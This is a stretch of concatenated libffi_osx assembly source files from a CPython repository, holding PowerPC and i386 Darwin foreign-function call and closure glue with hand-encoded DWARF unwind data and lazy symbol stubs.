.indirect_symbol _ffi_closure_SYSV_inner
hlt ; hlt ; hlt ; hlt ; hlt
/* Hand-coded DWARF CFI for the three entry points above (Mach-O
   coalesced __eh_frame). Byte values are standard DWARF CFA opcodes:
   0xc=def_cfa, 0xd=def_cfa_register, 0xe=def_cfa_offset,
   0x4=advance_loc4, 0x84/0x85=DW_CFA_offset for ebp/esi. */
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0
LSCIE1:
.long 0x0 /* CIE Identifier Tag */
.byte 0x1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 0x1 /* Code Alignment Factor */
.byte 0x7c /* sleb128 -4; Data Alignment Factor */
.byte 0x8 /* RA Column */
.byte 0x1 /* Augmentation size */
.byte 0x10 /* FDE Encoding (pcrel) */
.byte 0xc /* DW_CFA_def_cfa, %esp offset 4 */
.byte 0x5
.byte 0x4
.byte 0x88 /* DW_CFA_offset, return address */
.byte 0x1
.align 2
LECIE1:
.globl _ffi_call_SYSV.eh
_ffi_call_SYSV.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1
LASFDE1:
.long LASFDE1-EH_frame1
.long LFB1-.
.set L$set$2,LFE1-LFB1
.long L$set$2
.byte 0x0
.byte 0x4
.set L$set$3,LCFI0-LFB1
.long L$set$3
.byte 0xe
.byte 0x8
.byte 0x84
.byte 0x2
.byte 0x4
.set L$set$4,LCFI1-LCFI0
.long L$set$4
.byte 0xd
.byte 0x4
.align 2
LEFDE1:
.globl _ffi_closure_SYSV.eh
_ffi_closure_SYSV.eh:
LSFDE2:
.set L$set$5,LEFDE2-LASFDE2
.long L$set$5
LASFDE2:
.long LASFDE2-EH_frame1
.long LFB2-.
.set L$set$6,LFE2-LFB2
.long L$set$6
.byte 0x0
.byte 0x4
.set L$set$7,LCFI2-LFB2
.long L$set$7
.byte 0xe
.byte 0x8
.byte 0x84
.byte 0x2
.byte 0x4
.set L$set$8,LCFI3-LCFI2
.long L$set$8
.byte 0xd
.byte 0x4
.align 2
LEFDE2:
#if !FFI_NO_RAW_API
.globl _ffi_closure_raw_SYSV.eh
_ffi_closure_raw_SYSV.eh:
LSFDE3:
.set L$set$10,LEFDE3-LASFDE3
.long L$set$10
LASFDE3:
.long LASFDE3-EH_frame1
.long LFB3-.
.set L$set$11,LFE3-LFB3
.long L$set$11
.byte 0x0
.byte 0x4
.set L$set$12,LCFI4-LFB3
.long L$set$12
.byte 0xe
.byte 0x8
.byte 0x84
.byte 0x2
.byte 0x4
.set L$set$13,LCFI5-LCFI4
.long L$set$13
.byte 0xd
.byte 0x4
.byte 0x4
.set L$set$14,LCFI6-LCFI5
.long L$set$14
.byte 0x85
.byte 0x3
.align 2
LEFDE3:
#endif
#endif /* ifndef __x86_64__ */
#endif /* defined __i386__ */
|
akheron/cpython
| 9,719
|
Modules/_ctypes/libffi_osx/powerpc/ppc-darwin.S
|
#if defined(__ppc__) || defined(__ppc64__)
/* -----------------------------------------------------------------------
ppc-darwin.S - Copyright (c) 2000 John Hornkvist
Copyright (c) 2004 Free Software Foundation, Inc.
PowerPC Assembly glue.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ppc-darwin.h>
#include <architecture/ppc/mode_independent_asm.h>
.text
.align 2
.globl _ffi_prep_args
.text
.align 2
.globl _ffi_call_DARWIN
.text
.align 2
/* ------------------------------------------------------------------
   _ffi_call_DARWIN -- libffi foreign-function-call glue (ppc/ppc64).
   Register inputs on entry (set up by ffi_call in the C code --
   TODO confirm against the caller):
     r3  extended_cif*             (kept in r27, ppc64 only)
     r4  size of the outgoing argument data
     r5  flags                     -> saved in r31
     r6  rvalue (return buffer)    -> saved in r30
     r7  target function address   -> saved in r29
     r8  address of ffi_prep_args  -> r12 (dead after the first bctrl)
   r28 holds AP (the caller's stack pointer) across both calls.
   Builds a frame, has ffi_prep_args lay the arguments into it, loads
   the argument GPRs/FPRs from that frame, calls the target, then
   stores the return value according to the flag bits.
   ------------------------------------------------------------------ */
_ffi_call_DARWIN:
LFB0:
mr r12,r8 /* We only need r12 until the call,
so it doesn't have to be saved. */
LFB1:
/* Save the old stack pointer as AP. */
mr r8,r1
LCFI0:
#if defined(__ppc64__)
/* Allocate the stack space we need.
r4 (size of input data)
48 bytes (linkage area)
40 bytes (saved registers)
8 bytes (extra FPR)
r4 + 96 bytes total
*/
addi r4,r4,-96 // Add our overhead.
li r0,-32 // Align to 32 bytes.
and r4,r4,r0
#endif
stgux r1,r1,r4 // Grow the stack.
mflr r9
/* Save registers we use. */
#if defined(__ppc64__)
std r27,-40(r8)
#endif
stg r28,MODE_CHOICE(-16,-32)(r8)
stg r29,MODE_CHOICE(-12,-24)(r8)
stg r30,MODE_CHOICE(-8,-16)(r8)
stg r31,MODE_CHOICE(-4,-8)(r8)
stg r9,SF_RETURN(r8) /* return address */
#if !defined(POWERPC_DARWIN) /* TOC unused in OS X */
stg r2,MODE_CHOICE(20,40)(r1)
#endif
LCFI1:
#if defined(__ppc64__)
mr r27,r3 // our extended_cif
#endif
/* Save arguments over call. */
mr r31,r5 /* flags, */
mr r30,r6 /* rvalue, */
mr r29,r7 /* function address, */
mr r28,r8 /* our AP. */
LCFI2:
/* Call ffi_prep_args. */
mr r4,r1
li r9,0
mtctr r12 /* r12 holds address of _ffi_prep_args. */
bctrl
#if !defined(POWERPC_DARWIN) /* TOC unused in OS X */
lg r2,MODE_CHOICE(20,40)(r1)
#endif
/* Now do the call.
Set up cr1 with bits 4-7 of the flags. */
mtcrf 0x40,r31
/* Load all those argument registers.
We have set up a nice stack frame, just load it into registers. */
lg r3,SF_ARG1(r1)
lg r4,SF_ARG2(r1)
lg r5,SF_ARG3(r1)
lg r6,SF_ARG4(r1)
nop
lg r7,SF_ARG5(r1)
lg r8,SF_ARG6(r1)
lg r9,SF_ARG7(r1)
lg r10,SF_ARG8(r1)
/* Load all the FP registers. */
// CR bit 6 (set from the flags via mtcrf above) indicates FP args.
bf 6,L2 /* No floats to load. */
#if defined(__ppc64__)
lfd f1,MODE_CHOICE(-16,-40)-(14*8)(r28)
lfd f2,MODE_CHOICE(-16,-40)-(13*8)(r28)
lfd f3,MODE_CHOICE(-16,-40)-(12*8)(r28)
lfd f4,MODE_CHOICE(-16,-40)-(11*8)(r28)
nop
lfd f5,MODE_CHOICE(-16,-40)-(10*8)(r28)
lfd f6,MODE_CHOICE(-16,-40)-(9*8)(r28)
lfd f7,MODE_CHOICE(-16,-40)-(8*8)(r28)
lfd f8,MODE_CHOICE(-16,-40)-(7*8)(r28)
nop
lfd f9,MODE_CHOICE(-16,-40)-(6*8)(r28)
lfd f10,MODE_CHOICE(-16,-40)-(5*8)(r28)
lfd f11,MODE_CHOICE(-16,-40)-(4*8)(r28)
lfd f12,MODE_CHOICE(-16,-40)-(3*8)(r28)
nop
lfd f13,MODE_CHOICE(-16,-40)-(2*8)(r28)
lfd f14,MODE_CHOICE(-16,-40)-(1*8)(r28)
#elif defined(__ppc__)
lfd f1,MODE_CHOICE(-16,-40)-(13*8)(r28)
lfd f2,MODE_CHOICE(-16,-40)-(12*8)(r28)
lfd f3,MODE_CHOICE(-16,-40)-(11*8)(r28)
lfd f4,MODE_CHOICE(-16,-40)-(10*8)(r28)
nop
lfd f5,MODE_CHOICE(-16,-40)-(9*8)(r28)
lfd f6,MODE_CHOICE(-16,-40)-(8*8)(r28)
lfd f7,MODE_CHOICE(-16,-40)-(7*8)(r28)
lfd f8,MODE_CHOICE(-16,-40)-(6*8)(r28)
nop
lfd f9,MODE_CHOICE(-16,-40)-(5*8)(r28)
lfd f10,MODE_CHOICE(-16,-40)-(4*8)(r28)
lfd f11,MODE_CHOICE(-16,-40)-(3*8)(r28)
lfd f12,MODE_CHOICE(-16,-40)-(2*8)(r28)
nop
lfd f13,MODE_CHOICE(-16,-40)-(1*8)(r28)
#else
#error undefined architecture
#endif
L2:
mr r12,r29 // Put the target address in r12 as specified.
mtctr r12 // Get the address to call into CTR.
nop
nop
bctrl // Make the call.
// Deal with the return value.
#if defined(__ppc64__)
mtcrf 0x3,r31 // flags in cr6 and cr7
bt 27,L(st_return_value)
#elif defined(__ppc__)
mtcrf 0x1,r31 // flags in cr7
#else
#error undefined architecture
#endif
// The bt/bf tests below dispatch on flag bits copied into the CR;
// exact bit meanings are defined by the C side (ffi_darwin.c) --
// TODO confirm.
bt 30,L(done_return_value)
bt 29,L(fp_return_value)
stg r3,0(r30)
#if defined(__ppc__)
bf 28,L(done_return_value) // Store the second long if necessary.
stg r4,4(r30)
#endif
// Fall through
L(done_return_value):
lg r1,0(r1) // Restore stack pointer.
// Restore the registers we used.
lg r9,SF_RETURN(r1) // return address
lg r31,MODE_CHOICE(-4,-8)(r1)
mtlr r9
lg r30,MODE_CHOICE(-8,-16)(r1)
lg r29,MODE_CHOICE(-12,-24)(r1)
lg r28,MODE_CHOICE(-16,-32)(r1)
#if defined(__ppc64__)
ld r27,-40(r1)
#endif
blr
#if defined(__ppc64__)
L(st_return_value):
// ppc64 struct return: spill all result GPRs/FPRs, then let the C
// helper copy them into RAM form at the caller's return area (r30).
// Grow the stack enough to fit the registers. Leave room for 8 args
// to trample the 1st 8 slots in param area.
stgu r1,-SF_ROUND(280)(r1) // 64 + 104 + 48 + 64
// Store GPRs
std r3,SF_ARG9(r1)
std r4,SF_ARG10(r1)
std r5,SF_ARG11(r1)
std r6,SF_ARG12(r1)
nop
std r7,SF_ARG13(r1)
std r8,SF_ARG14(r1)
std r9,SF_ARG15(r1)
std r10,SF_ARG16(r1)
// Store FPRs
nop
bf 26,L(call_struct_to_ram_form)
stfd f1,SF_ARG17(r1)
stfd f2,SF_ARG18(r1)
stfd f3,SF_ARG19(r1)
stfd f4,SF_ARG20(r1)
nop
stfd f5,SF_ARG21(r1)
stfd f6,SF_ARG22(r1)
stfd f7,SF_ARG23(r1)
stfd f8,SF_ARG24(r1)
nop
stfd f9,SF_ARG25(r1)
stfd f10,SF_ARG26(r1)
stfd f11,SF_ARG27(r1)
stfd f12,SF_ARG28(r1)
nop
stfd f13,SF_ARG29(r1)
L(call_struct_to_ram_form):
ld r3,0(r27) // extended_cif->cif*
ld r3,16(r3) // ffi_cif->rtype*
addi r4,r1,SF_ARG9 // stored GPRs
addi r6,r1,SF_ARG17 // stored FPRs
li r5,0 // GPR size ptr (NULL)
li r7,0 // FPR size ptr (NULL)
li r8,0 // FPR count ptr (NULL)
li r10,0 // struct offset (NULL)
mr r9,r30 // return area
bl Lffi64_struct_to_ram_form$stub
lg r1,0(r1) // Restore stack pointer.
b L(done_return_value)
#endif
L(fp_return_value):
/* Do we have long double to store? */
bf 31,L(fd_return_value)
stfd f1,0(r30)
stfd f2,8(r30)
b L(done_return_value)
L(fd_return_value):
/* Do we have double to store? */
bf 28,L(float_return_value)
stfd f1,0(r30)
b L(done_return_value)
L(float_return_value):
/* We only have a float to store. */
stfs f1,0(r30)
b L(done_return_value)
LFE1:
/* END(_ffi_call_DARWIN) */
/* Provide a null definition of _ffi_call_AIX. */
/* The AIX entry point is referenced by shared libffi code but is not
   supported on Darwin, so this stub simply returns to the caller. */
.text
.align 2
.globl _ffi_call_AIX
.text
.align 2
_ffi_call_AIX:
blr
/* END(_ffi_call_AIX) */
/* Hand-encoded DWARF call-frame information (CIE + FDE) for
   _ffi_call_DARWIN, so the unwinder can step through this frame.
   The per-line ';' comments name each encoded DWARF opcode/operand. */
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0 ; Length of Common Information Entry
LSCIE1:
.long 0x0 ; CIE Identifier Tag
.byte 0x1 ; CIE Version
.ascii "zR\0" ; CIE Augmentation
.byte 0x1 ; uleb128 0x1; CIE Code Alignment Factor
.byte 0x7c ; sleb128 -4; CIE Data Alignment Factor
.byte 0x41 ; CIE RA Column
.byte 0x1 ; uleb128 0x1; Augmentation size
.byte 0x10 ; FDE Encoding (pcrel)
.byte 0xc ; DW_CFA_def_cfa
.byte 0x1 ; uleb128 0x1
.byte 0x0 ; uleb128 0x0
.align LOG2_GPR_BYTES
LECIE1:
.globl _ffi_call_DARWIN.eh
_ffi_call_DARWIN.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1 ; FDE Length
LASFDE1:
.long LASFDE1-EH_frame1 ; FDE CIE offset
.g_long LFB0-. ; FDE initial location
.set L$set$3,LFE1-LFB0
.g_long L$set$3 ; FDE address range
.byte 0x0 ; uleb128 0x0; Augmentation size
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$4,LCFI0-LFB1
.long L$set$4
.byte 0xd ; DW_CFA_def_cfa_register
.byte 0x08 ; uleb128 0x08
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$5,LCFI1-LCFI0
.long L$set$5
.byte 0x11 ; DW_CFA_offset_extended_sf
.byte 0x41 ; uleb128 0x41
.byte 0x7e ; sleb128 -2
.byte 0x9f ; DW_CFA_offset, column 0x1f
.byte 0x1 ; uleb128 0x1
.byte 0x9e ; DW_CFA_offset, column 0x1e
.byte 0x2 ; uleb128 0x2
.byte 0x9d ; DW_CFA_offset, column 0x1d
.byte 0x3 ; uleb128 0x3
.byte 0x9c ; DW_CFA_offset, column 0x1c
.byte 0x4 ; uleb128 0x4
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$6,LCFI2-LCFI1
.long L$set$6
.byte 0xd ; DW_CFA_def_cfa_register
.byte 0x1c ; uleb128 0x1c
.align LOG2_GPR_BYTES
LEFDE1:
#if defined(__ppc64__)
/* Lazy PIC stub for ffi64_struct_to_ram_form (ppc64 only).
   The bcl/mflr pair materializes a PC-relative base in r11; the stub
   then loads the lazy pointer and jumps through it.  The lazy pointer
   initially holds dyld_stub_binding_helper, so dyld binds the real
   symbol on first use.  r0 (saved LR) is restored before the jump. */
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi64_struct_to_ram_form$stub:
.indirect_symbol _ffi64_struct_to_ram_form
mflr r0
bcl 20,31,LO$ffi64_struct_to_ram_form
LO$ffi64_struct_to_ram_form:
mflr r11
addis r11,r11,ha16(L_ffi64_struct_to_ram_form$lazy_ptr - LO$ffi64_struct_to_ram_form)
mtlr r0
lgu r12,lo16(L_ffi64_struct_to_ram_form$lazy_ptr - LO$ffi64_struct_to_ram_form)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi64_struct_to_ram_form$lazy_ptr:
.indirect_symbol _ffi64_struct_to_ram_form
.g_long dyld_stub_binding_helper
#endif // __ppc64__
#endif // __ppc__ || __ppc64__
|
akheron/cpython
| 9,914
|
Modules/_ctypes/libffi_osx/powerpc/ppc64-darwin_closure.S
|
#if defined(__ppc64__)
/* -----------------------------------------------------------------------
ppc64-darwin_closure.S - Copyright (c) 2002, 2003, 2004, Free Software Foundation,
Inc. based on ppc_closure.S
PowerPC Assembly glue.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <ffi.h>
#include <ppc-ffitarget.h> // for FFI_TRAMPOLINE_SIZE
#include <ppc-darwin.h>
#include <architecture/ppc/mode_independent_asm.h>
.file "ppc64-darwin_closure.S"
.text
.align LOG2_GPR_BYTES
.globl _ffi_closure_ASM
.text
.align LOG2_GPR_BYTES
/* ------------------------------------------------------------------
   _ffi_closure_ASM (ppc64) -- closure entry reached from the libffi
   trampoline.  On entry r11 = closure context pointer placed there by
   the trampoline (see the comment at the helper call below).
   Spills the incoming argument GPRs/FPRs, sizes and builds a frame,
   calls ffi_closure_helper_DARWIN to run the user callback, then
   dispatches on the returned FFI type code through a table of
   16-byte code fragments to load the return value into the proper
   registers.
   ------------------------------------------------------------------ */
_ffi_closure_ASM:
LFB1:
mflr r0
stg r0,SF_RETURN(r1) // save return address
// Save GPRs 3 - 10 (aligned to 8) in the parent's outgoing area.
stg r3,SF_ARG1(r1)
stg r4,SF_ARG2(r1)
stg r5,SF_ARG3(r1)
stg r6,SF_ARG4(r1)
stg r7,SF_ARG5(r1)
stg r8,SF_ARG6(r1)
stg r9,SF_ARG7(r1)
stg r10,SF_ARG8(r1)
LCFI0:
/* 48 bytes (Linkage Area)
64 bytes (outgoing parameter area, always reserved)
112 bytes (14*8 for incoming FPR)
? bytes (result)
112 bytes (14*8 for outgoing FPR)
16 bytes (2 saved registers)
352 + ? total bytes
*/
std r31,-8(r1) // Save registers we use.
std r30,-16(r1)
mr r30,r1 // Save the old SP.
mr r31,r11 // Save the ffi_closure around ffi64_data_size.
// Calculate the space we need.
stdu r1,-SF_MINSIZE(r1)
ld r3,FFI_TRAMPOLINE_SIZE(r31) // ffi_closure->cif*
ld r3,16(r3) // ffi_cif->rtype*
bl Lffi64_data_size$stub
ld r1,0(r1)
addi r3,r3,352 // Add our overhead.
neg r3,r3
li r0,-32 // Align to 32 bytes.
and r3,r3,r0
stdux r1,r1,r3 // Grow the stack.
mr r11,r31 // Copy the ffi_closure back.
LCFI1:
// We want to build up an area for the parameters passed
// in registers. (both floating point and integer)
/* 320 bytes (callee stack frame aligned to 32)
48 bytes (caller linkage area)
368 (start of caller parameter area aligned to 8)
*/
// Save FPRs 1 - 14. (aligned to 8)
stfd f1,112(r1)
stfd f2,120(r1)
stfd f3,128(r1)
stfd f4,136(r1)
stfd f5,144(r1)
stfd f6,152(r1)
stfd f7,160(r1)
stfd f8,168(r1)
stfd f9,176(r1)
stfd f10,184(r1)
stfd f11,192(r1)
stfd f12,200(r1)
stfd f13,208(r1)
stfd f14,216(r1)
// Set up registers for the routine that actually does the work.
mr r3,r11 // context pointer from the trampoline
addi r4,r1,224 // result storage
addi r5,r30,SF_ARG1 // saved GPRs
addi r6,r1,112 // saved FPRs
bl Lffi_closure_helper_DARWIN$stub
// Look the proper starting point in table
// by using return type as an offset.
// (r3 holds the FFI return-type code on return from the helper.)
addi r5,r1,224 // Get pointer to results area.
bl Lget_ret_type0_addr // Get pointer to Lret_type0 into LR.
mflr r4 // Move to r4.
slwi r3,r3,4 // Now multiply return type by 16.
add r3,r3,r4 // Add contents of table to table address.
mtctr r3
bctr
LFE1:
// Each of the ret_typeX code fragments has to be exactly 16 bytes long
// (4 instructions). For cache effectiveness we align to a 16 byte
// boundary first.
.align 4
nop
nop
nop
Lget_ret_type0_addr:
blrl
// case FFI_TYPE_VOID
Lret_type0:
b Lfinish
nop
nop
nop
// case FFI_TYPE_INT
Lret_type1:
lwz r3,4(r5)
b Lfinish
nop
nop
// case FFI_TYPE_FLOAT
Lret_type2:
lfs f1,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_DOUBLE
Lret_type3:
lfd f1,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_LONGDOUBLE
Lret_type4:
lfd f1,0(r5)
lfd f2,8(r5)
b Lfinish
nop
// case FFI_TYPE_UINT8
Lret_type5:
lbz r3,7(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT8
Lret_type6:
lbz r3,7(r5)
extsb r3,r3
b Lfinish
nop
// case FFI_TYPE_UINT16
Lret_type7:
lhz r3,6(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT16
Lret_type8:
lha r3,6(r5)
b Lfinish
nop
nop
// case FFI_TYPE_UINT32
Lret_type9: // same as Lret_type1
lwz r3,4(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT32
Lret_type10: // same as Lret_type1
lwz r3,4(r5)
b Lfinish
nop
nop
// case FFI_TYPE_UINT64
Lret_type11:
ld r3,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT64
Lret_type12: // same as Lret_type11
ld r3,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_STRUCT
Lret_type13:
b Lret_struct
nop
nop
nop
// ** End 16-byte aligned cases **
// case FFI_TYPE_POINTER
// This case assumes that FFI_TYPE_POINTER == FFI_TYPE_LAST. If more types
// are added in future, the following code will need to be updated and
// padded to 16 bytes.
Lret_type14:
lg r3,0(r5)
b Lfinish
// copy struct into registers
Lret_struct:
ld r31,FFI_TRAMPOLINE_SIZE(r31) // ffi_closure->cif*
ld r3,16(r31) // ffi_cif->rtype*
ld r31,24(r31) // ffi_cif->flags
mr r4,r5 // copy struct* to 2nd arg
addi r7,r1,SF_ARG9 // GPR return area
addi r9,r30,-16-(14*8) // FPR return area
li r5,0 // struct offset ptr (NULL)
li r6,0 // FPR used count ptr (NULL)
li r8,0 // GPR return area size ptr (NULL)
li r10,0 // FPR return area size ptr (NULL)
bl Lffi64_struct_to_reg_form$stub
// Load GPRs
ld r3,SF_ARG9(r1)
ld r4,SF_ARG10(r1)
ld r5,SF_ARG11(r1)
ld r6,SF_ARG12(r1)
nop
ld r7,SF_ARG13(r1)
ld r8,SF_ARG14(r1)
ld r9,SF_ARG15(r1)
ld r10,SF_ARG16(r1)
nop
// Load FPRs
mtcrf 0x2,r31
bf 26,Lfinish
lfd f1,-16-(14*8)(r30)
lfd f2,-16-(13*8)(r30)
lfd f3,-16-(12*8)(r30)
lfd f4,-16-(11*8)(r30)
nop
lfd f5,-16-(10*8)(r30)
lfd f6,-16-(9*8)(r30)
lfd f7,-16-(8*8)(r30)
lfd f8,-16-(7*8)(r30)
nop
lfd f9,-16-(6*8)(r30)
lfd f10,-16-(5*8)(r30)
lfd f11,-16-(4*8)(r30)
lfd f12,-16-(3*8)(r30)
nop
lfd f13,-16-(2*8)(r30)
lfd f14,-16-(1*8)(r30)
// Fall through
// case done
Lfinish:
lg r1,0(r1) // Restore stack pointer.
ld r31,-8(r1) // Restore registers we used.
ld r30,-16(r1)
lg r0,SF_RETURN(r1) // Get return address.
mtlr r0 // Reset link register.
blr
// END(ffi_closure_ASM)
/* Hand-encoded DWARF CFI (CIE + FDE) for the ppc64 _ffi_closure_ASM.
   NOTE(review): the first DW_CFA_advance_loc4 uses LCFI1-LCFI0 and
   the second uses LCFI0-LFB1 -- reversed relative to the code order
   of those labels -- and L$set$3 is defined twice (L$set$2 is never
   used).  This matches the shipped libffi_osx source, but looks
   suspicious; confirm against upstream before modifying. */
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0 ; Length of Common Information Entry
LSCIE1:
.long 0x0 ; CIE Identifier Tag
.byte 0x1 ; CIE Version
.ascii "zR\0" ; CIE Augmentation
.byte 0x1 ; uleb128 0x1; CIE Code Alignment Factor
.byte 0x7c ; sleb128 -4; CIE Data Alignment Factor
.byte 0x41 ; CIE RA Column
.byte 0x1 ; uleb128 0x1; Augmentation size
.byte 0x10 ; FDE Encoding (pcrel)
.byte 0xc ; DW_CFA_def_cfa
.byte 0x1 ; uleb128 0x1
.byte 0x0 ; uleb128 0x0
.align LOG2_GPR_BYTES
LECIE1:
.globl _ffi_closure_ASM.eh
_ffi_closure_ASM.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1 ; FDE Length
LASFDE1:
.long LASFDE1-EH_frame1 ; FDE CIE offset
.g_long LFB1-. ; FDE initial location
.set L$set$3,LFE1-LFB1
.g_long L$set$3 ; FDE address range
.byte 0x0 ; uleb128 0x0; Augmentation size
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$3,LCFI1-LCFI0
.long L$set$3
.byte 0xe ; DW_CFA_def_cfa_offset
.byte 176,1 ; uleb128 176
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$4,LCFI0-LFB1
.long L$set$4
.byte 0x11 ; DW_CFA_offset_extended_sf
.byte 0x41 ; uleb128 0x41
.byte 0x7e ; sleb128 -2
.align LOG2_GPR_BYTES
LEFDE1:
.data
.align LOG2_GPR_BYTES
LDFCM0:
/* Lazy PIC stubs for the three external helpers used above.  Each
   stub computes the address of its lazy pointer PC-relatively
   (bcl/mflr trick), restores LR, and jumps through the pointer; the
   pointer initially targets dyld_stub_binding_helper so dyld binds
   the real symbol on first use. */
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi_closure_helper_DARWIN$stub:
.indirect_symbol _ffi_closure_helper_DARWIN
mflr r0
bcl 20,31,LO$ffi_closure_helper_DARWIN
LO$ffi_closure_helper_DARWIN:
mflr r11
addis r11,r11,ha16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)
mtlr r0
lgu r12,lo16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi_closure_helper_DARWIN$lazy_ptr:
.indirect_symbol _ffi_closure_helper_DARWIN
.g_long dyld_stub_binding_helper
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi64_struct_to_reg_form$stub:
.indirect_symbol _ffi64_struct_to_reg_form
mflr r0
bcl 20,31,LO$ffi64_struct_to_reg_form
LO$ffi64_struct_to_reg_form:
mflr r11
addis r11,r11,ha16(L_ffi64_struct_to_reg_form$lazy_ptr - LO$ffi64_struct_to_reg_form)
mtlr r0
lgu r12,lo16(L_ffi64_struct_to_reg_form$lazy_ptr - LO$ffi64_struct_to_reg_form)(r11)
mtctr r12
bctr
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi64_data_size$stub:
.indirect_symbol _ffi64_data_size
mflr r0
bcl 20,31,LO$ffi64_data_size
LO$ffi64_data_size:
mflr r11
addis r11,r11,ha16(L_ffi64_data_size$lazy_ptr - LO$ffi64_data_size)
mtlr r0
lgu r12,lo16(L_ffi64_data_size$lazy_ptr - LO$ffi64_data_size)(r11)
mtctr r12
bctr
/* Lazy pointers for the last two stubs are grouped here. */
.lazy_symbol_pointer
L_ffi64_struct_to_reg_form$lazy_ptr:
.indirect_symbol _ffi64_struct_to_reg_form
.g_long dyld_stub_binding_helper
L_ffi64_data_size$lazy_ptr:
.indirect_symbol _ffi64_data_size
.g_long dyld_stub_binding_helper
#endif // __ppc64__
|
akheron/cpython
| 7,234
|
Modules/_ctypes/libffi_osx/powerpc/ppc-darwin_closure.S
|
#if defined(__ppc__)
/* -----------------------------------------------------------------------
ppc-darwin_closure.S - Copyright (c) 2002, 2003, 2004, Free Software Foundation,
Inc. based on ppc_closure.S
PowerPC Assembly glue.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <ffi.h>
#include <ppc-ffitarget.h> // for FFI_TRAMPOLINE_SIZE
#include <ppc-darwin.h>
#include <architecture/ppc/mode_independent_asm.h>
.file "ppc-darwin_closure.S"
.text
.align LOG2_GPR_BYTES
.globl _ffi_closure_ASM
.text
.align LOG2_GPR_BYTES
/* ------------------------------------------------------------------
   _ffi_closure_ASM (ppc32) -- closure entry reached from the libffi
   trampoline.  On entry r11 = closure context pointer placed there by
   the trampoline (see the comment at the helper call below).
